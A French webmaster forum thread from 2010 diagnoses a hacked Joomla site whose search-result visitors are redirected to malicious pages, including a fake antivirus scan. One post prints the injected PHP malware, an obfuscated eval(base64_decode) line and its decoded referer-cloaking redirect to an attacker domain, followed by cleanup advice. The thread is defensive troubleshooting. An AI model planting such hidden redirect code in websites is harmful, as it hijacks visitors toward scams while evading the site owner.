Redirection Google piraté !!!

Discussion dans 'Crawl et indexation Google, sitemaps' créé par Allance, 22 Février 2010.

1. Allance
    Allance WRInaute discret
    Inscrit:
    5 Mars 2003
    J'aime reçus:
    0
    Bonjour,

Il y a un comportement bizarre dans les résultats de Google sur une requête.
    Lorsque l'on tape "choeur symphonique" dans Google, le premier résultat affiche le site du Choeur Symponique de Paris, dont l'URL affiché est http://www.choeursymphonique.org
    https://www.google.fr/search?q=choeur+symphonique

Le problème est que lorsqu'on clique sur ce lien, on arrive sur un autre site :
    -http://p3p0.com/?said=3333g&q=choeur+symphonique

Cela voudrait dire que le résultat de Google a été piraté et la redirection du résultat sur un autre site.

2. u8086
    u8086 WRInaute passionné
    Inscrit:
    24 Mai 2004
    J'aime reçus:
    0
    A mon avis, c'est choeursymphonique.org qui est piraté.

3. kanon90
    kanon90 WRInaute impliqué
    Inscrit:
    23 Mars 2007
    J'aime reçus:
    0
    troublant en effet, mais non, c'est le site qui a été piraté, et en fonction du referer ( le résultat est le même si tu utilises yahoo) ca redirige ou pas l'adresse.

4. Allance
    Allance WRInaute discret
    Inscrit:
    5 Mars 2003
    J'aime reçus:
    0
    Non ce n'est pas le site qui est piraté car quand on tape son URL directement dans la barre d'adresse il n'y a pas de problème, et on a vérifié le site.

La version en cache du site est bonne également, c'est l'enregistrement de Google qui déconne.

5. Allance
    Allance WRInaute discret
    Inscrit:
    5 Mars 2003
    J'aime reçus:
    0
    Est-il possible qu'il ait été piraté à un moment donné, avec une redirection 301 qui a mis à jour les enregistrements Google et Yahoo, et ensuite le site corrigé ?

Google et Yahoo ont a ce moment là enregistré la nouvelle URL grâce à la redirection permanente, et maintenant difficile de revenir en arrière ?

On peut tracer cette redirection, si vous dites qu'elle est encore active en fonction du referer ?

6. finstreet
    finstreet WRInaute accro
    Inscrit:
    10 Juillet 2005
    J'aime reçus:
    2
    et plus sérieusement tu n'as pas pensé que c'était juste le pirate qui permettait de taper directement l'url dans le navigateur pour éviter de se faire repérer tout de suite et ainsi rester plus longtemps tout en captant 100% du trafic venant de Google ?

7. Allance
    Allance WRInaute discret
    Inscrit:
    5 Mars 2003
    J'aime reçus:
    0
    Et on peut le vérifier ça ?

Il y a possibilité de suivre les header http pour voir si c'est vraiment une redirection du site et pas un mauvais enregistrement dans Google ?

8. guicara
    guicara WRInaute passionné
    Inscrit:
    2 Février 2006
    J'aime reçus:
    0
    Il y a deux minutes en partant du lien de Google, je suis tombé sur une page redirigé, puis automatique sur une réduction du navigateur > fenêtre javascript > faux scannage AV.

URL : (ATTENTION) -http://www1.newsystem-shield.in

Et maintenant, plus moyen de revenir sur ce site via la recherche google (pas un problème de Cookie car testé sur un autre navigateur) !

Par pour moi, un accès sur choeursymphonique.org me renvois sur le site de recherche.
    Au chargement de la page j'ai aussi : fgnfdfthrv.bee.pl

EDIT : Tu n'ai pas le seul touché, une petite recherche sur cette dernière URL dans Google et tu à pléthore de renseignements (tu n'aurais pas le CMS Joomla par hasard ?).

EDIT 2 :
    Un autre webmaster :
    Le code malicieux en question :

Code:
    * See COPYRIGHT.php for copyright notices and details.
    */ eval(base64_decode("CglpZiAoc3R....")); 
    qui se décode en :

Code:
    if (stristr($_SERVER[HTTP_REFERER],"google")) {
    	if (!stristr($_SERVER[HTTP_REFERER],".nu") and !stristr($_SERVER[HTTP_REFERER],"site") and !stristr($_SERVER[HTTP_REFERER],"inurl")){
    		preg_match ("/q\=(.*)/",$_SERVER[HTTP_REFERER],$kk);
    		if (stristr($kk[1],"&")) {
    			preg_match ("/(.*?)\&/",$kk[1],$key2);
    			$keyword=urldecode($key2[1]);
    		}else {
    			$keyword=urldecode($kk[1]);
    		}
    		header("Location: h**p://fgnfdfthrv.bee.pl/?q=".$keyword);
    		exit();
    	}

}elseif (stristr($_SERVER[HTTP_REFERER],"yahoo")) {
    preg_match ("/p\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
    		header("Location: h**p://fgnfdfthrv.bee.pl/?q=".$kk[1]);
    		exit();
    }elseif (stristr($_SERVER[HTTP_REFERER],"bing")) {
    preg_match ("/q\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
    		header("Location: h**p://fgnfdfthrv.bee.pl/?q=".$kk[1]);
    		exit();
    }

Donc il regardait bien le référer (google, yahoo ou bing). Mais ce qui est étrange, c'est qu'un appel direct de ta page renvois sur le site en question (je t'invite donc à regarder tes autres pages). (edit : ou peut l'accès direct contrôlé avec "$_SERVER[HTTP_REFERER],"inurl"" ?).

Donc :
    1. Supprimer le code malicieux
    2. Regarder si d'autres pages ne sont pas infectés
    3. Sa ne serait pas un mal de changer des MDP (au cas où)
    4. Mettre à jour Joomla dans sa dernière version

Tiens nous au courant ! :)

9. Allance
    Allance WRInaute discret
    Inscrit:
    5 Mars 2003
    J'aime reçus:
    0
    Si c'est un joomla. Effectivement il y a bien un test du referer et une redirection vers bee.pl, j'ai pu tracer les header.

Où as-tu trouvé ce code ? Sur ce site ou sur des forums ?

Quel est la page corrompu ?

10. guicara
    guicara WRInaute passionné
    Inscrit:
    2 Février 2006
    J'aime reçus:
    0
    Le code est publié sur des forums (notamment allemand, mais tu le trouve aussi sur google groups).
    Ta page concernée : -http://www.choeursymphonique.org/includes/defines.php

11. Allance
    Allance WRInaute discret
    Inscrit:
    5 Mars 2003
    J'aime reçus:
    0
  12. kanon90
    kanon90 WRInaute impliqué
    Inscrit:
    23 Mars 2007
    J'aime reçus:
    0

heureusement que le site a été vérifié :mrgreen:

Ca serait quand même un comble que google soit attaqué pour au final pirater ton site ;-)

bon courage pour les corrections :wink:

13. Allance
    Allance WRInaute discret
    Inscrit:
    5 Mars 2003
    J'aime reçus:
    0
    Ce n'est pas moi qui administre ce site ;)
    OVH avait fait une vérification du site et avait dit qu'il était CLEAN... hum...

Faut dire que la modification était bien planqué

14. DVCAM
    DVCAM Nouveau WRInaute
    Inscrit:
    18 Juin 2009
    J'aime reçus:
    0
    J'ai été victime également avec un site Joomla.
    L'outil pour webmaster/diagnostics/logiciels malveillants de google n'avait rien détecté non plus.

Après tout, c'est peut-être logique car googlebot ne scanne pas la partie administration de joomla ?!...

cdt

Chargement...